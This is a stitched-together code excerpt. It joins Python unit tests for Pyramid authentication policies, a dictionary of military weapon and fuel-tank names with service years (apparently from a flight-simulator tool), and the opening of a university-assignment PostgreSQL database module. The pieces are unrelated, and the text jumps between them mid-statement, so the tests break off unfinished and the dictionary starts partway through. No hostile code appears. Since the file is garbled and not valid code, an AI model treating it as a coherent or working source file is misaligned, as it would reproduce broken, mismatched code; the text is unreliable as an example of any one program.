self.assertEqual(policy.unauthenticated_userid(request), None)
def test_unauthenticated_userid(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), 'fred')
def test_authenticated_userid_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_authenticated_userid_repoze_who_userid_is_None(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':None}})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_with_callback_returns_None(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
def callback(identity, request):
return None
policy = self._makeOne(callback=callback)
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_with_callback_returns_something(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
def callback(identity, request):
return ['agroup']
policy = self._makeOne(callback=callback)
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_authenticated_userid_unclean_principal_Authenticated(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Authenticated'}}
)
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_unclean_principal_Everyone(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Everyone'}}
)
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_effective_principals_None(self):
from pyramid.security import Everyone
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_userid_only(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred'])
def test_effective_principals_userid_and_groups(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred',
'groups':['quux', 'biz']}})
def callback(identity, request):
return identity['groups']
policy = self._makeOne(callback=callback)
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred', 'quux', 'biz'])
def test_effective_principals_userid_callback_returns_None(self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred',
'groups':['quux', 'biz']}})
def callback(identity, request):
return None
policy = self._makeOne(callback=callback)
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_repoze_who_userid_is_None(self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':None}}
)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_repoze_who_userid_is_unclean_Everyone(self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Everyone'}}
)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_repoze_who_userid_is_unclean_Authenticated(
self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Authenticated'}}
)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_remember_no_plugins(self):
request = DummyRequest({})
policy = self._makeOne()
result = policy.remember(request, 'fred')
self.assertEqual(result, [])
def test_remember(self):
authtkt = DummyWhoPlugin()
request = DummyRequest(
{'repoze.who.plugins':{'auth_tkt':authtkt}})
policy = self._makeOne()
result = policy.remember(request, 'fred')
self.assertEqual(result[0], request.environ)
self.assertEqual(result[1], {'repoze.who.userid':'fred'})
def test_remember_kwargs(self):
authtkt = DummyWhoPlugin()
request = DummyRequest(
{'repoze.who.plugins':{'auth_tkt':authtkt}})
policy = self._makeOne()
result = policy.remember(request, 'fred', max_age=23)
self.assertEqual(result[1], {'repoze.who.userid':'fred', 'max_age': 23})
def test_forget_no_plugins(self):
request = DummyRequest({})
policy = self._makeOne()
result = policy.forget(request)
self.assertEqual(result, [])
def test_forget(self):
authtkt = DummyWhoPlugin()
request = DummyRequest(
{'repoze.who.plugins':{'auth_tkt':authtkt},
'repoze.who.identity':{'repoze.who.userid':'fred'},
})
policy = self._makeOne()
result = policy.forget(request)
self.assertEqual(result[0], request.environ)
self.assertEqual(result[1], request.environ['repoze.who.identity'])
class TestRemoteUserAuthenticationPolicy(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import RemoteUserAuthenticationPolicy
return RemoteUserAuthenticationPolicy
def _makeOne(self, environ_key='REMOTE_USER', callback=None):
return self._getTargetClass()(environ_key, callback)
def test_class_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyClass
from pyramid.interfaces import IAuthenticationPolicy
verifyClass(IAuthenticationPolicy, self._getTargetClass())
def test_instance_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyObject
from pyramid.interfaces import IAuthenticationPolicy
verifyObject(IAuthenticationPolicy, self._makeOne())
def test_unauthenticated_userid_returns_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), None)
def test_unauthenticated_userid(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), 'fred')
def test_authenticated_userid_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_effective_principals_None(self):
from pyramid.security import Everyone
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred'])
def test_remember(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
result = policy.remember(request, 'fred')
self.assertEqual(result, [])
def test_forget(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
result = policy.forget(request)
self.assertEqual(result, [])
class TestAuthTktAuthenticationPolicy(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import AuthTktAuthenticationPolicy
return AuthTktAuthenticationPolicy
def _makeOne(self, callback, cookieidentity, **kw):
inst = self._getTargetClass()('secret', callback, **kw)
inst.cookie = DummyCookieHelper(cookieidentity)
return inst
def setUp(self):
self.warnings = warnings.catch_warnings()
self.warnings.__enter__()
warnings.simplefilter('ignore', DeprecationWarning)
def tearDown(self):
self.warnings.__exit__(None, None, None)
def test_allargs(self):
# pass all known args
inst = self._getTargetClass()(
'secret', callback=None, cookie_name=None, secure=False,
include_ip=False, timeout=None, reissue_time=None,
hashalg='sha512',
)
self.assertEqual(inst.callback, None)
def test_hashalg_override(self):
# important to ensure hashalg is passed to cookie helper
inst = self._getTargetClass()('secret', hashalg='sha512')
self.assertEqual(inst.cookie.hashalg, 'sha512')
def test_unauthenticated_userid_returns_None(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
self.assertEqual(policy.unauthenticated_userid(request), None)
def test_unauthenticated_userid(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne(None, {'userid':'fred'})
self.assertEqual(policy.unauthenticated_userid(request), 'fred')
def test_authenticated_userid_no_cookie_identity(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_callback_returns_None(self):
request = DummyRequest({})
def callback(userid, request):
return None
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid(self):
request = DummyRequest({})
def callback(userid, request):
return True
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_effective_principals_no_cookie_identity(self):
from pyramid.security import Everyone
request = DummyRequest({})
policy = self._makeOne(None, None)
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_callback_returns_None(self):
from pyramid.security import Everyone
request = DummyRequest({})
def callback(userid, request):
return None
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest({})
def callback(userid, request):
return ['group.foo']
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred', 'group.foo'])
def test_remember(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
result = policy.remember(request, 'fred')
self.assertEqual(result, [])
def test_remember_with_extra_kargs(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
result = policy.remember(request, 'fred', a=1, b=2)
self.assertEqual(policy.cookie.kw, {'a':1, 'b':2})
self.assertEqual(result, [])
def test_forget(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
result = policy.forget(request)
self.assertEqual(result, [])
def test_class_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyClass
from pyramid.interfaces import IAuthenticationPolicy
verifyClass(IAuthenticationPolicy, self._getTargetClass())
def test_instance_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyObject
from pyramid.interfaces import IAuthenticationPolicy
verifyObject(IAuthenticationPolicy, self._makeOne(None, None))
class TestAuthTktCookieHelper(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import AuthTktCookieHelper
return AuthTktCookieHelper
def _makeOne(self, *arg, **kw):
helper = self._getTargetClass()(*arg, **kw)
# laziness after moving auth_tkt classes and funcs into
# authentication module
auth_tkt = DummyAuthTktModule()
helper.auth_tkt = auth_tkt
helper.AuthTicket = auth_tkt.AuthTicket
helper.parse_ticket = auth_tkt.parse_ticket
helper.BadTicket = auth_tkt.BadTicket
return helper
def _makeRequest(self, cookie=None, ipv6=False):
environ = {'wsgi.version': (1,0)}
if cookie:
'Exit':1990},
'R-60': {'Entry':1973, 'Exit':1992},
'R-60M': {'Entry':1983, 'Exit':2999},
'R-60MK': {'Entry':1983, 'Exit':2999},
'R-73': {'Entry':1972, 'Exit':2007},
'R-73E': {'Entry':1984, 'Exit':2999},
'R-73M': {'Entry':1997, 'Exit':2999},
'R-73M2': {'Entry':2011, 'Exit':2999},
'R-77': {'Entry':1991, 'Exit':2999},
'R-77PL': {'Entry':2007, 'Exit':2999},
'R-77T': {'Entry':1991, 'Exit':2999},
'3M9M': {'Entry':1967, 'Exit':1975},
'3M9M1': {'Entry':1973, 'Exit':1982},
'3M9M3': {'Entry':1976, 'Exit':1984},
'3M9M4': {'Entry':1978, 'Exit':1988},
'40N6': {'Entry':2012, 'Exit':2999},
'40N6D': {'Entry':2012, 'Exit':2999},
'48N6': {'Entry':1993, 'Exit':2999},
'48N6D': {'Entry':2010, 'Exit':2999},
'48N6DM': {'Entry':2018, 'Exit':2999},
'48N6E': {'Entry':1993, 'Exit':2999},
'48N6E2': {'Entry':2010, 'Exit':2999},
'48N6E3': {'Entry':2018, 'Exit':2999},
'5V55K': {'Entry':1978, 'Exit':2008},
'5V55KD': {'Entry':1990, 'Exit':2006},
'5V55PM': {'Entry':1990, 'Exit':2999},
'5V55R': {'Entry':1982, 'Exit':1994},
'5V55RD': {'Entry':1990, 'Exit':2006},
'5V55RM': {'Entry':1981, 'Exit':2999},
'5V55RUD': {'Entry':1990, 'Exit':2999},
'5V55S': {'Entry':1982, 'Exit':1994},
'5V55U': {'Entry':1990, 'Exit':2007},
'5V55V': {'Entry':1993, 'Exit':2007},
'9K32 Strela 2': {'Entry':1968, 'Exit':2999},
'9M32 Strela 2': {'Entry':1969, 'Exit':2999},
'9M32M Strela 3': {'Entry':1974, 'Exit':2999},
'9M311 Kashtan': {'Entry':1989, 'Exit':2999},
'9M317': {'Entry':1998, 'Exit':2999},
'9M33': {'Entry':1971, 'Exit':1977},
'9M330 Kinzhal': {'Entry':1986, 'Exit':2999},
'9M33M': {'Entry':1972, 'Exit':1980},
'9M33M2': {'Entry':1975, 'Exit':1988},
'9M33M3': {'Entry':1980, 'Exit':1991},
'9M38': {'Entry':1980, 'Exit':1991},
'9M38M1': {'Entry':1983, 'Exit':1991},
'9M38M2': {'Entry':1998, 'Exit':2999},
'9M39M1': {'Entry':1998, 'Exit':2999},
'9M82': {'Entry':1986, 'Exit':1996},
'9M82M': {'Entry':1992, 'Exit':2999},
'9M83': {'Entry':1988, 'Exit':1997},
'9M83M': {'Entry':1998, 'Exit':2999},
'9M8M': {'Entry':1965, 'Exit':1980},
'9M8M1': {'Entry':1967, 'Exit':1984},
'9M8M2': {'Entry':1971, 'Exit':1990},
'9M8M3': {'Entry':1974, 'Exit':1993},
'9M96': {'Entry':2007, 'Exit':2999},
'9M96D': {'Entry':2007, 'Exit':2999},
'9M96E': {'Entry':2007, 'Exit':2999},
'9M96E2': {'Entry':2007, 'Exit':2999},
'Igla-M': {'Entry':1983, 'Exit':2999},
'V-300': {'Entry':1952, 'Exit':1993},
'V-600': {'Entry':1961, 'Exit':1970},
'V-601': {'Entry':1963, 'Exit':2999},
'V-611': {'Entry':1967, 'Exit':2999},
'V-611M': {'Entry':1972, 'Exit':2999},
'V-750': {'Entry':1957, 'Exit':1976},
'V-750V': {'Entry':1958, 'Exit':1980},
'V-750VN': {'Entry':1958, 'Exit':1980},
'V-755': {'Entry':1959, 'Exit':1991},
'V-759': {'Entry':1968, 'Exit':1996},
'V-760': {'Entry':1975, 'Exit':1996},
'V-860': {'Entry':1967, 'Exit':1980},
'V-860P': {'Entry':1967, 'Exit':1980},
'V-860PV': {'Entry':1970, 'Exit':1983},
'V-870': {'Entry':1975, 'Exit':1991},
'V-880': {'Entry':1976, 'Exit':1991},
'V-880E': {'Entry':1970, 'Exit':1983},
'V-880M': {'Entry':1976, 'Exit':1991},
'V-880MN': {'Entry':1976, 'Exit':1991},
'V-880N': {'Entry':1976, 'Exit':1991},
'RPK-3 Metel': {'Entry':1969, 'Exit':2999},
'RPK-6 Vodopod': {'Entry':1981, 'Exit':2999},
'RPK-7 Veter': {'Entry':1984, 'Exit':2999},
'50mm (2in) FFAR Rockets': {'Entry':1948, 'Exit':2999},
'5in FFAR': {'Entry':1943, 'Exit':1946},
'5in HVAR': {'Entry':1944, 'Exit':1955},
'RP-3 AP': {'Entry':1943, 'Exit':1947},
'RP-3 HE': {'Entry':1943, 'Exit':1947},
'S-24B 240mm': {'Entry':1973, 'Exit':2999},
'S-25C 266mm': {'Entry':1971, 'Exit':2999},
'S-25OF 266mm': {'Entry':1971, 'Exit':2999},
'S-3K 160mm': {'Entry':1944, 'Exit':1955},
'S-5K 57mm': {'Entry':1955, 'Exit':2999},
'S-5K Rocket': {'Entry':1955, 'Exit':2999},
'S-5M Rocket': {'Entry':1955, 'Exit':2999},
'S-8B 80mm': {'Entry':1955, 'Exit':2999},
'S-8K 80mm': {'Entry':1955, 'Exit':2999},
'Kh-15': {'Entry':1980, 'Exit':2999},
'Kh-22N': {'Entry':1971, 'Exit':2999},
'Kh-58U': {'Entry':1988, 'Exit':2020},
'RDS 220 Tsar Bomba 50MT': {'Entry':1961, 'Exit':1961},
'RN-25': {'Entry':1960, 'Exit':1991},
'RN-28': {'Entry':1974, 'Exit':1991},
'TN-1000': {'Entry':1960, 'Exit':2999},
'APR-2E': {'Entry':1962, 'Exit':2999},
'AT-1': {'Entry':1962, 'Exit':2999},
'AT-2M': {'Entry':1975, 'Exit':2999},
'VTT-1': {'Entry':1900, 'Exit':2999},
"310 liter tank": {'Entry':1900, 'Exit':2999},
"100 gallon wing tank": {'Entry':1900, 'Exit':2999},
"400 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-400": {'Entry':1900, 'Exit':2999},
"120 gallon tank": {'Entry':1900, 'Exit':2999},
"150 gallon tank": {'Entry':1900, 'Exit':2999},
"300 gallon tank": {'Entry':1900, 'Exit':2999},
"450 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-490": {'Entry':1900, 'Exit':2999},
"500 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-600": {'Entry':1900, 'Exit':2999},
"600 liter tank": {'Entry':1900, 'Exit':2999},
"Tanque de 600 litros": {'Entry':1900, 'Exit':2999},
"625 liter tank": {'Entry':1900, 'Exit':2999},
"700 liter tank": {'Entry':1900, 'Exit':2999},
"190 gallon wing tank": {'Entry':1900, 'Exit':2999},
"750 litre tank": {'Entry':1900, 'Exit':2999},
"750 liter tank": {'Entry':1900, 'Exit':2999},
"782 liter tank": {'Entry':1900, 'Exit':2999},
"800 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-800": {'Entry':1900, 'Exit':2999},
"900 liter tank": {'Entry':1900, 'Exit':2999},
"1000 liter tank": {'Entry':1900, 'Exit':2999},
"FPU-1": {'Entry':1900, 'Exit':2999},
"285 Gallon Internal Tank FB-111": {'Entry':1900, 'Exit':2999},
"1100 Liter Tank": {'Entry':1900, 'Exit':2999},
"300 Gallon Internal Tank FB-111": {'Entry':1900, 'Exit':2999},
"300 gallon wing tank": {'Entry':1900, 'Exit':2999},
"Tanque de 300 galones": {'Entry':1900, 'Exit':2999},
"1150 Liter Tank": {'Entry':1900, 'Exit':2999},
"PTB 1150": {'Entry':1900, 'Exit':2999},
"FPU-6": {'Entry':1900, 'Exit':2999},
"1200 liter tank": {'Entry':1900, 'Exit':2999},
"330 gallon wing tank": {'Entry':1900, 'Exit':2999},
"Tanque de 330 galones": {'Entry':1900, 'Exit':2999},
"1250 liter tank": {'Entry':1900, 'Exit':2999},
"FPU-8": {'Entry':1900, 'Exit':2999},
"370 gallon wing tank": {'Entry':1900, 'Exit':2999},
"Tanque de 370 galones": {'Entry':1900, 'Exit':2999},
"1400 liter tank": {'Entry':1900, 'Exit':2999},
"1520 Liter Tank": {'Entry':1900, 'Exit':2999},
"1700 liter tank": {'Entry':1900, 'Exit':2999},
"2000 liter tank": {'Entry':1900, 'Exit':2999},
"Lightning Ventral Tank": {'Entry':1900, 'Exit':2999},
"594 gallon wing tank": {'Entry':1900, 'Exit':2999},
"600 gallon centerline tank": {'Entry':1900, 'Exit':2999},
"Tanque de 600 galones": {'Entry':1900, 'Exit':2999},
"600 gallon tank": {'Entry':1900, 'Exit':2999},
"FPU-7": {'Entry':1900, 'Exit':2999},
"3000 liter tank": {'Entry':1900, 'Exit':2999},
"AJ500 Fuel": {'Entry':1900, 'Exit':2999},
"AJ840 Fuel": {'Entry':1900, 'Exit':2999},
"AJ1340 Fuel": {'Entry':1900, 'Exit':2999},
".30 cal bullet": {'Entry':1900, 'Exit':2999},
".50 cal bullet air": {'Entry':1900, 'Exit':2999},
".50 cal bullet": {'Entry':1900, 'Exit':2999},
"100mm 3BM6 HVAPDS": {'Entry':1900, 'Exit':2999},
"100mm AA": {'Entry':1900, 'Exit':2999},
"100mm F-55 HE": {'Entry':1900, 'Exit':2999},
"100mm FRAG": {'Entry':1900, 'Exit':2999},
"100mm OEA F1 HE": {'Entry':1900, 'Exit':2999},
"100mm OEA Mle 1928": {'Entry':1900, 'Exit':2999},
"100mm OF-55 FRAG": {'Entry':1900, 'Exit':2999},
"100mm OF-58 FRAG": {'Entry':1900, 'Exit':2999},
"100mm OPF F4 PFHE": {'Entry':1900, 'Exit':2999},
"100mm ZS-55P AA": {'Entry':1900, 'Exit':2999},
"100mm ZS-58 AA": {'Entry':1900, 'Exit':2999},
"100mm ZS-58P AA": {'Entry':1900, 'Exit':2999},
"105mm APFSDS": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE(AA fuse)": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE-ER": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE-ER(AA fuse)": {'Entry':1900, 'Exit':2999},
"114mm/53 mk6 AA": {'Entry':1900, 'Exit':2999},
"114mm/53 mk6 HE": {'Entry':1900, 'Exit':2999},
"114mm/53 mk6 SAP": {'Entry':1900, 'Exit':2999},
"115mm 3VBM-1 APFSDS": {'Entry':1900, 'Exit':2999},
"12.7mm B-30 AP": {'Entry':1900, 'Exit':2999},
"12.7mm B-32 APi": {'Entry':1900, 'Exit':2999},
"12.7mm YaKB Burst": {'Entry':1900, 'Exit':2999},
"12.7x108mm": {'Entry':1900, 'Exit':2999},
"120mm M829A2 APFSDS": {'Entry':1900, 'Exit':2999},
"125mm 3VBM19 APFSDS": {'Entry':1900, 'Exit':2999},
"127mm mk 127 HE-CVT EX-175": {'Entry':1900, 'Exit':2999},
"127mm mk 127 HE-CVT mk 67": {'Entry':1900, 'Exit':2999},
"127mm mk 32": {'Entry':1900, 'Exit':2999},
"127mm mk 34 AAC": {'Entry':1900, 'Exit':2999},
"127mm mk 41 AAC": {'Entry':1900, 'Exit':2999},
"127mm mk 41 HC": {'Entry':1900, 'Exit':2999},
"127mm mk 80 HE-PD EX-175": {'Entry':1900, 'Exit':2999},
"127mm mk 80 HE-PD mk 67": {'Entry':1900, 'Exit':2999},
"12cm/50 Mdl50 HE": {'Entry':1900, 'Exit':2999},
"130mm AK-130": {'Entry':1900, 'Exit':2999},
"130mm F-44 HE": {'Entry':1900, 'Exit':2999},
"130mm OF-42 HE-FRAG": {'Entry':1900, 'Exit':2999},
"130mm PB-42 SAP": {'Entry':1900, 'Exit':2999},
"130mm ZS-42P AA": {'Entry':1900, 'Exit':2999},
"130mm ZS-44 AA": {'Entry':1900, 'Exit':2999},
"130mm ZS-44P AA": {'Entry':1900, 'Exit':2999},
"152mm AP B-35": {'Entry':1900, 'Exit':2999},
"152mm HE OF-35": {'Entry':1900, 'Exit':2999},
"152mm SAP PB-35": {'Entry':1900, 'Exit':2999},
"20mm APT percussion": {'Entry':1900, 'Exit':2999},
"20mm F2": {'Entry':1900, 'Exit':2999},
"20mm HE-T x10": {'Entry':1900, 'Exit':2999},
"20mm HE-T x2": {'Entry':1900, 'Exit':2999},
"20mm HE-T": {'Entry':1900, 'Exit':2999},
"20mm HEI Electric": {'Entry':1900, 'Exit':2999},
"20mm HEI Percussion": {'Entry':1900, 'Exit':2999},
"20mm HS.404 x2": {'Entry':1900, 'Exit':2999},
"20mm HS.404": {'Entry':1900, 'Exit':2999},
"20mm M53 API": {'Entry':1900, 'Exit':2999},
"20mm Mark 149-4": {'Entry':1900, 'Exit':2999},
"20mm Meroka APDS-T": {'Entry':1900, 'Exit':2999},
"20mm Mk-15": {'Entry':1900, 'Exit':2999},
"20mm PGU": {'Entry':1900, 'Exit':2999},
"20mm PGU-28/B": {'Entry':1900, 'Exit':2999},
"20mm Rh202 HE-T": {'Entry':1900, 'Exit':2999},
"20mm SAP(b)": {'Entry':1900, 'Exit':2999},
"20mm mark 244-0 ELC": {'Entry':1900, 'Exit':2999},
"20mm/85 GAM-B01 HE-I": {'Entry':1900, 'Exit':2999},
"20x102 mm burst": {'Entry':1900, 'Exit':2999},
"20x110 mm x2": {'Entry':1900, 'Exit':2999},
"20x110 mm": {'Entry':1900, 'Exit':2999},
"23mm AM-23": {'Entry':1900, 'Exit':2999},
"23mm AM/NR-23 HEI x2": {'Entry':1900, 'Exit':2999},
"23mm AM/NR-23 HEI": {'Entry':1900, 'Exit':2999},
"23mm GSh-23 HEI": {'Entry':1900, 'Exit':2999},
"23mm OFZ": {'Entry':1900, 'Exit':2999},
"25mm APDS": {'Entry':1900, 'Exit':2999},
"25mm APDS-T": {'Entry':1900, 'Exit':2999},
"25mm FAPDS-T": {'Entry':1900, 'Exit':2999},
"25mm HE-I-T": {'Entry':1900, 'Exit':2999},
"25mm HEI": {'Entry':1900, 'Exit':2999},
"25mm HEI-T": {'Entry':1900, 'Exit':2999},
"25mm M791 APDS-T": {'Entry':1900, 'Exit':2999},
"25mm SAPHEI": {'Entry':1900, 'Exit':2999},
"25mm SAPHEI-T": {'Entry':1900, 'Exit':2999},
"27mm DM10 FAPDS": {'Entry':1900, 'Exit':2999},
"27mm FAPDS": {'Entry':1900, 'Exit':2999},
"27mm HE": {'Entry':1900, 'Exit':2999},
"30mm 3UBR8 APDS": {'Entry':1900, 'Exit':2999},
"30mm ADEN API": {'Entry':1900, 'Exit':2999},
"30mm AK-630": {'Entry':1900, 'Exit':2999},
"30mm AP-I": {'Entry':1900, 'Exit':2999},
"30mm APDS": {'Entry':1900, 'Exit':2999},
"30mm APDS-T": {'Entry':1900, 'Exit':2999},
"30mm APFSDS-T": {'Entry':1900, 'Exit':2999},
"30mm API": {'Entry':1900, 'Exit':2999},
"30mm Br-83 AP": {'Entry':1900, 'Exit':2999},
"30mm DEFA": {'Entry':1900, 'Exit':2999},
"30mm F-33 HE": {'Entry':1900, 'Exit':2999},
"30mm FMPDS": {'Entry':1900, 'Exit':2999},
"30mm HE": {'Entry':1900, 'Exit':2999},
"30mm HEI": {'Entry':1900, 'Exit':2999},
"30mm HEI-T": {'Entry':1900, 'Exit':2999},
"30mm M230 Chaingun Ammo": {'Entry':1900, 'Exit':2999},
"30mm NR-30 HEI x2": {'Entry':1900, 'Exit':2999},
"30mm NR-30 HEI": {'Entry':1900, 'Exit':2999},
"30mm OF-83 HE-FRAG": {'Entry':1900, 'Exit':2999},
"30mm OF-84 HE-FRAG AK-306": {'Entry':1900, 'Exit':2999},
"30mm OF-84 HE-FRAG AK-630M": {'Entry':1900, 'Exit':2999},
"30mm OF-84 HE-FRAG Kashtan-M": {'Entry':1900, 'Exit':2999},
"30mm OP-84 FRAG Tracer AK-306": {'Entry':1900, 'Exit':2999},
"30mm OP-84 FRAG Tracer AK-630M": {'Entry':1900, 'Exit':2999},
"30mm OP-84 FRAG Tracer Kashtan-M": {'Entry':1900, 'Exit':2999},
"30mm PGU-13/B HE-I": {'Entry':1900, 'Exit':2999},
"30mm PGU-14/B API": {'Entry':1900, 'Exit':2999},
"30mm SAPHEI-T": {'Entry':1900, 'Exit':2999},
"30mm Su-25": {'Entry':1900, 'Exit':2999},
"30mm Type 730": {'Entry':1900, 'Exit':2999},
"30mm/75 GCM-AO3-2 APDS": {'Entry':1900, 'Exit':2999},
"30mm/75 GCM-AO3-2 HE": {'Entry':1900, 'Exit':2999},
"30x150mm GIAT": {'Entry':1900, 'Exit':2999},
"35mm AHEAD": {'Entry':1900, 'Exit':2999},
"37mm HE-FRAG Tracer x2": {'Entry':1900, 'Exit':2999},
"37mm HE-FRAG Tracer": {'Entry':1900, 'Exit':2999},
"37mm HE-FRAG": {'Entry':1900, 'Exit':2999},
"37mm Type 676 HE-FRAG": {'Entry':1900, 'Exit':2999},
"40 mm L70 HE x5": {'Entry':1900, 'Exit':2999},
"406mm Mk13 HC": {'Entry':1900, 'Exit':2999},
"406mm Mk8 AP": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1 x2": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1 x4": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1 x8": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1": {'Entry':1900, 'Exit':2999},
| |
#!/usr/bin/env python3
"""
MediaServer Database module.
Contains all interactions between the webapp and the queries to the database.
"""
import configparser
import json
import sys
from modules import pg8000
################################################################################
# Welcome to the database file, where all the query magic happens.
# My biggest tip is to look at the *week 8 lab*.
# Important information:
# - If you're getting issues and getting locked out of your database.
# You may have reached the maximum number of connections.
# Why? (You're not closing things!) Be careful!
# - Check things *carefully*.
# - There may be better ways to do things, this is just for example
# purposes
# - ORDERING MATTERS
# - Unfortunately to make it easier for everyone, we have to ask that
# your columns are in order. WATCH YOUR SELECTS!! :)
# Good luck!
# And remember to have some fun :D
################################################################################
#############################
# #
# Database Helper Functions #
# #
#############################
#####################################################
# Database Connect
# (No need to touch
# (unless the exception is potatoing))
#####################################################
def database_connect():
"""
Connects to the database using the connection string.
    If None is returned, there was an issue connecting to
    the database. It would be wise to handle this ;)
"""
# Read the config file
config = configparser.ConfigParser()
config.read('config.ini')
if 'database' not in config['DATABASE']:
config['DATABASE']['database'] = config['DATABASE']['user']
# Create a connection to the database
connection = None
try:
# Parses the config file and connects using the connect string
connection = pg8000.connect(database=config['DATABASE']['database'],
user=config['DATABASE']['user'],
password=config['DATABASE']['password'],
host=config['DATABASE']['host'])
except pg8000.OperationalError as operation_error:
        print("""Error: either config.ini has not been updated or the connection
        failed. Update your config file first, then check your internet
        connection and try again.""")
print(operation_error)
return None
# return the connection to use
return connection
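Per the warning at the top of this file, forgetting to close connections eventually exhausts the connection limit. A minimal sketch of one way to guarantee `close()` runs, using `contextlib.closing` (here `DummyConnection` is a hypothetical stand-in for a pg8000 connection, not part of this module):

```python
from contextlib import closing

class DummyConnection:
    """Stand-in with the same close() contract as a pg8000 connection."""
    def __init__(self):
        self.closed = False
    def close(self):
        self.closed = True

# closing() guarantees close() runs even if the body raises, which is the
# simplest way to avoid the "maximum number of connections" lock-out
conn = DummyConnection()
with closing(conn):
    pass
print(conn.closed)
```

The same pattern works with the real connection returned by `database_connect()`.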
##################################################
# Print a SQL string to see how it would insert #
##################################################
def print_sql_string(inputstring, params=None):
"""
    Prints a parameterized SQL string with its parameters substituted,
    assuming all parameters are strings.
"""
if params is not None:
if params != []:
inputstring = inputstring.replace("%s","'%s'")
print(inputstring % params)
#####################################################
# SQL Dictionary Fetch
# useful for pulling particular items as a dict
# (No need to touch
# (unless the exception is potatoing))
# Expected return:
# singlerow: [{col1name:col1value,col2name:col2value, etc.}]
# multiplerow: [{col1name:col1value,col2name:col2value, etc.},
